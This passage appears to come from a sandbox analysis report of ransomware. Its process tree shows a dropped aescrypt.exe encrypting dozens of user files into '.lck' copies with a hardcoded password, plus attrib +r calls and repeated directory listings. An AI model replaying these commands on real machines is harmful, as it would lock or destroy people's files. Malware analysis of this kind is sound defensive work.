    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockRestart.xltx.lck" "UnblockRestart.xltx"
    3⤵
    - Executes dropped EXE
    PID:4620
- - C:\Windows\system32\attrib.exe
    attrib +r "UnblockRestart.xltx.lck"
    3⤵
    - Views/modifies file attributes
    PID:4536
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "StepRemove.doc.lck" "StepRemove.doc"
    3⤵
    - Executes dropped EXE
    PID:3196
- - C:\Windows\system32\attrib.exe
    attrib +r "StepRemove.doc.lck"
    3⤵
    - Views/modifies file attributes
    PID:532
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "WaitPush.pptm.lck" "WaitPush.pptm"
    3⤵
    PID:4616
- - C:\Windows\system32\attrib.exe
    attrib +r "WaitPush.pptm.lck"
    3⤵
    - Views/modifies file attributes
    PID:1504
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestartExport.potx.lck" "RestartExport.potx"
    3⤵
    PID:1240
- - C:\Windows\system32\attrib.exe
    attrib +r "RestartExport.potx.lck"
    3⤵
    - Views/modifies file attributes
    PID:1280
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DebugUnlock.pdf.lck" "DebugUnlock.pdf"
    3⤵
    PID:1392
- - C:\Windows\system32\attrib.exe
    attrib +r "DebugUnlock.pdf.lck"
    3⤵
    PID:1448
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UpdateRestore.ppsm.lck" "UpdateRestore.ppsm"
    3⤵
    PID:1104
- - C:\Windows\system32\attrib.exe
    attrib +r "UpdateRestore.ppsm.lck"
    3⤵
    PID:1784
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "WritePush.ppsx.lck" "WritePush.ppsx"
    3⤵
    PID:1684
- - C:\Windows\system32\attrib.exe
    attrib +r "WritePush.ppsx.lck"
    3⤵
    - Views/modifies file attributes
    PID:1876
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnpublishSync.doc.lck" "UnpublishSync.doc"
    3⤵
    PID:1952
- - C:\Windows\system32\attrib.exe
    attrib +r "UnpublishSync.doc.lck"
    3⤵
    PID:4364
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestoreLimit.mpp.lck" "RestoreLimit.mpp"
    3⤵
    PID:2128
- - C:\Windows\system32\attrib.exe
    attrib +r "RestoreLimit.mpp.lck"
    3⤵
    - Views/modifies file attributes
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SwitchUninstall.mpp.lck" "SwitchUninstall.mpp"
    3⤵
    PID:216
- - C:\Windows\system32\attrib.exe
    attrib +r "SwitchUninstall.mpp.lck"
    3⤵
    PID:2380
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GroupGet.xls.lck" "GroupGet.xls"
    3⤵
    PID:4100
- - C:\Windows\system32\attrib.exe
    attrib +r "GroupGet.xls.lck"
    3⤵
    PID:4108
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "InstallSwitch.html.lck" "InstallSwitch.html"
    3⤵
    PID:2568
- - C:\Windows\system32\attrib.exe
    attrib +r "InstallSwitch.html.lck"
    3⤵
    - Views/modifies file attributes
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2576
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:2820
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:2584
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "WaitCheckpoint.mhtml.lck" "WaitCheckpoint.mhtml"
    3⤵
    PID:4736
- - C:\Windows\system32\attrib.exe
    attrib +r "WaitCheckpoint.mhtml.lck"
    3⤵
    - Views/modifies file attributes
    PID:4712
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertToSend.mhtml.lck" "ConvertToSend.mhtml"
    3⤵
    PID:4740
- - C:\Windows\system32\attrib.exe
    attrib +r "ConvertToSend.mhtml.lck"
    3⤵
    PID:2572
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OpenWatch.vsw.lck" "OpenWatch.vsw"
    3⤵
    PID:200
- - C:\Windows\system32\attrib.exe
    attrib +r "OpenWatch.vsw.lck"
    3⤵
    - Views/modifies file attributes
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "FindInvoke.ppsm.lck" "FindInvoke.ppsm"
    3⤵
    PID:4624
- - C:\Windows\system32\attrib.exe
    attrib +r "FindInvoke.ppsm.lck"
    3⤵
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ClearExpand.tiff.lck" "ClearExpand.tiff"
    3⤵
    PID:3660
- - C:\Windows\system32\attrib.exe
    attrib +r "ClearExpand.tiff.lck"
    3⤵
    - Views/modifies file attributes
    PID:4756
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnregisterOptimize.vssx.lck" "UnregisterOptimize.vssx"
    3⤵
    PID:2644
- - C:\Windows\system32\attrib.exe
    attrib +r "UnregisterOptimize.vssx.lck"
    3⤵
    PID:4808
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestorePing.xltx.lck" "RestorePing.xltx"
    3⤵
    PID:4700
- - C:\Windows\system32\attrib.exe
    attrib +r "RestorePing.xltx.lck"
    3⤵
    PID:1376
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetSplit.M2V.lck" "GetSplit.M2V"
    3⤵
    PID:3104
- - C:\Windows\system32\attrib.exe
    attrib +r "GetSplit.M2V.lck"
    3⤵
    - Views/modifies file attributes
    PID:4352
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UpdateBlock.ps1.lck" "UpdateBlock.ps1"
    3⤵
    PID:4336
- - C:\Windows\system32\attrib.exe
    attrib +r "UpdateBlock.ps1.lck"
    3⤵
    PID:4356
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "TraceRead.ocx.lck" "TraceRead.ocx"
    3⤵
    PID:3012
- - C:\Windows\system32\attrib.exe
    attrib +r "TraceRead.ocx.lck"
    3⤵
    PID:4596
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "LimitWait.txt.lck" "LimitWait.txt"
    3⤵
    PID:4856
- - C:\Windows\system32\attrib.exe
    attrib +r "LimitWait.txt.lck"
    3⤵
    PID:1620
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResolveMeasure.wdp.lck" "ResolveMeasure.wdp"
    3⤵
    PID:3612
- - C:\Windows\system32\attrib.exe
    attrib +r "ResolveMeasure.wdp.lck"
    3⤵
    PID:5112
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendSave.vstm.lck" "SuspendSave.vstm"
    3⤵
    PID:4184
- - C:\Windows\system32\attrib.exe
    attrib +r "SuspendSave.vstm.lck"
    3⤵
    PID:3264
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OutResize.vstx.lck" "OutResize.vstx"
    3⤵
    PID:284
- - C:\Windows\system32\attrib.exe
    attrib +r "OutResize.vstx.lck"
    3⤵
    PID:4256
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CopySuspend.TTS.lck" "CopySuspend.TTS"
    3⤵
    PID:4272
- - C:\Windows\system32\attrib.exe
    attrib +r "CopySuspend.TTS.lck"
    3⤵
    - Views/modifies file attributes
    PID:4448
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResizeTest.DVR.lck" "ResizeTest.DVR"
    3⤵
    PID:4244
- - C:\Windows\system32\attrib.exe
    attrib +r "ResizeTest.DVR.lck"
    3⤵
    PID:4424
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetRequest.mpa.lck" "GetRequest.mpa"
    3⤵
    PID:4084
- - C:\Windows\system32\attrib.exe
    attrib +r "GetRequest.mpa.lck"
    3⤵
    PID:3380
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExportSplit.ram.lck" "ExportSplit.ram"
    3⤵
    PID:3108
- - C:\Windows\system32\attrib.exe
    attrib +r "ExportSplit.ram.lck"
    3⤵
    PID:4260
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitRestore.wma.lck" "SplitRestore.wma"
    3⤵
    PID:3900
- - C:\Windows\system32\attrib.exe
    attrib +r "SplitRestore.wma.lck"
    3⤵
    PID:1692
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConnectRead.xls.lck" "ConnectRead.xls"
    3⤵
    PID:4496
- - C:\Windows\system32\attrib.exe
    attrib +r "ConnectRead.xls.lck"
    3⤵
    PID:4552
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CompressClose.vdx.lck" "CompressClose.vdx"
    3⤵
    PID:660
- - C:\Windows\system32\attrib.exe
    attrib +r "CompressClose.vdx.lck"
    3⤵
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ReadDisconnect.pcx.lck" "ReadDisconnect.pcx"
    3⤵
    PID:1136
- - C:\Windows\system32\attrib.exe
    attrib +r "ReadDisconnect.pcx.lck"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExportHide.dwg.lck" "ExportHide.dwg"
    3⤵
    PID:1096
- - C:\Windows\system32\attrib.exe
    attrib +r "ExportHide.dwg.lck"
    3⤵
    - Views/modifies file attributes
    PID:4844
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideComplete.wma.lck" "HideComplete.wma"
    3⤵
    PID:1448
- - C:\Windows\system32\attrib.exe
    attrib +r "HideComplete.wma.lck"
    3⤵
    PID:1776
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitPing.png.lck" "SplitPing.png"
    3⤵
    PID:1880
- - C:\Windows\system32\attrib.exe
    attrib +r "SplitPing.png.lck"
    3⤵
    PID:1876
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "PushProtect.MTS.lck" "PushProtect.MTS"
    3⤵
    PID:2124
- - C:\Windows\system32\attrib.exe
    attrib +r "PushProtect.MTS.lck"
    3⤵
    PID:208
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "PushInstall.3gpp.lck" "PushInstall.3gpp"
    3⤵
    PID:192
- - C:\Windows\system32\attrib.exe
    attrib +r "PushInstall.3gpp.lck"
    3⤵
    PID:188
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RemoveSplit.jtx.lck" "RemoveSplit.jtx"
    3⤵
    PID:4104
- - C:\Windows\system32\attrib.exe
    attrib +r "RemoveSplit.jtx.lck"
    3⤵
    - Views/modifies file attributes
    PID:2156
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MeasureStart.wpl.lck" "MeasureStart.wpl"
    3⤵
    PID:2592
- - C:\Windows\system32\attrib.exe
    attrib +r "MeasureStart.wpl.lck"
    3⤵
    - Views/modifies file attributes
    PID:4724
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ProtectConvertTo.au.lck" "ProtectConvertTo.au"
    3⤵
    PID:2576
- - C:\Windows\system32\attrib.exe
    attrib +r "ProtectConvertTo.au.lck"
    3⤵
    - Views/modifies file attributes
    PID:2692
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MergePublish.pptm.lck" "MergePublish.pptm"
    3⤵
    PID:2676
- - C:\Windows\system32\attrib.exe
    attrib +r "MergePublish.pptm.lck"
    3⤵
    PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2864
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Bing.url.lck" "Bing.url"
    3⤵
    PID:2496
- - C:\Windows\system32\attrib.exe
    attrib +r "Bing.url.lck"
    3⤵
    PID:1536
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:4368
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    - Views/modifies file attributes
    PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Desktop.lnk.lck" "Desktop.lnk"
    3⤵
    PID:752
- - C:\Windows\system32\attrib.exe
    attrib +r "Desktop.lnk.lck"
    3⤵
    PID:756
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:4880
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:3392
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Downloads.lnk.lck" "Downloads.lnk"
    3⤵
    PID:1376
- - C:\Windows\system32\attrib.exe
    attrib +r "Downloads.lnk.lck"
    3⤵
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4352
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:4332
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    - Views/modifies file attributes
    PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4328
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:4596
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:3336
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SkipClose.nfo.lck" "SkipClose.nfo"
    3⤵
    PID:296
- - C:\Windows\system32\attrib.exe
    attrib +r "SkipClose.nfo.lck"
    3⤵
    - Views/modifies file attributes
    PID:4848
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "EnterFormat.cfg.lck" "EnterFormat.cfg"
    3⤵
    PID:4212
- - C:\Windows\system32\attrib.exe
    attrib +r "EnterFormat.cfg.lck"
    3⤵
    - Views/modifies file attributes
    PID:292
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetUnregister.otf.lck" "GetUnregister.otf"
    3⤵
    PID:3264
- - C:\Windows\system32\attrib.exe
    attrib +r "GetUnregister.otf.lck"
    3⤵
    PID:4048
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SelectResize.svgz.lck" "SelectResize.svgz"
    3⤵
    PID:4276
- - C:\Windows\system32\attrib.exe
    attrib +r "SelectResize.svgz.lck"
    3⤵
    - Views/modifies file attributes
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExpandCheckpoint.doc.lck" "ExpandCheckpoint.doc"
    3⤵
    PID:380
- - C:\Windows\system32\attrib.exe
    attrib +r "ExpandCheckpoint.doc.lck"
    3⤵
    PID:4428
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendDeny.cmd.lck" "SuspendDeny.cmd"
    3⤵
    PID:1664
- - C:\Windows\system32\attrib.exe
    attrib +r "SuspendDeny.cmd.lck"
    3⤵
    PID:1960
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CompareDisable.cr2.lck" "CompareDisable.cr2"
    3⤵
    PID:4436
- - C:\Windows\system32\attrib.exe
    attrib +r "CompareDisable.cr2.lck"
    3⤵
    PID:4080
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestartLimit.M2T.lck" "RestartLimit.M2T"
    3⤵
    PID:4432
- - C:\Windows\system32\attrib.exe
    attrib +r "RestartLimit.M2T.lck"
    3⤵
    PID:4504
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RevokeUnlock.xlsb.lck" "RevokeUnlock.xlsb"
    3⤵
    PID:4492
- - C:\Windows\system32\attrib.exe
    attrib +r "RevokeUnlock.xlsb.lck"
    3⤵
    - Views/modifies file attributes
    PID:1692
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertApprove.bat.lck" "ConvertApprove.bat"
    3⤵
    PID:4088
- - C:\Windows\system32\attrib.exe
    attrib +r "ConvertApprove.bat.lck"
    3⤵
    - Views/modifies file attributes
    PID:4544
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MoveCompare.nfo.lck" "MoveCompare.nfo"
    3⤵
    PID:1260
- - C:\Windows\system32\attrib.exe
    attrib +r "MoveCompare.nfo.lck"
    3⤵
    PID:1144
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideMerge.xla.lck" "HideMerge.xla"
    3⤵
    PID:1272
- - C:\Windows\system32\attrib.exe
    attrib +r "HideMerge.xla.lck"
    3⤵
    - Views/modifies file attributes
    PID:1404
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MoveOpen.zip.lck" "MoveOpen.zip"
    3⤵
    PID:4844
- - C:\Windows\system32\attrib.exe
    attrib +r "MoveOpen.zip.lck"
    3⤵
    - Views/modifies file attributes
    PID:1644
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OutRegister.mpeg3.lck" "OutRegister.mpeg3"
    3⤵
    PID:1668
- - C:\Windows\system32\attrib.exe
    attrib +r "OutRegister.mpeg3.lck"
    3⤵
    - Views/modifies file attributes
    PID:1820
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideSelect.xps.lck" "HideSelect.xps"
    3⤵
    PID:1828
- - C:\Windows\system32\attrib.exe
    attrib +r "HideSelect.xps.lck"
    3⤵
    - Views/modifies file attributes
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UpdateExit.xla.lck" "UpdateExit.xla"
    3⤵
    PID:212
- - C:\Windows\system32\attrib.exe
    attrib +r "UpdateExit.xla.lck"
    3⤵
    PID:188
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockUninstall.ADTS.lck" "UnblockUninstall.ADTS"
    3⤵
    PID:2372
- - C:\Windows\system32\attrib.exe
    attrib +r "UnblockUninstall.ADTS.lck"
    3⤵
    PID:4724
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnpublishFind.sql.lck" "UnpublishFind.sql"
    3⤵
    PID:4404
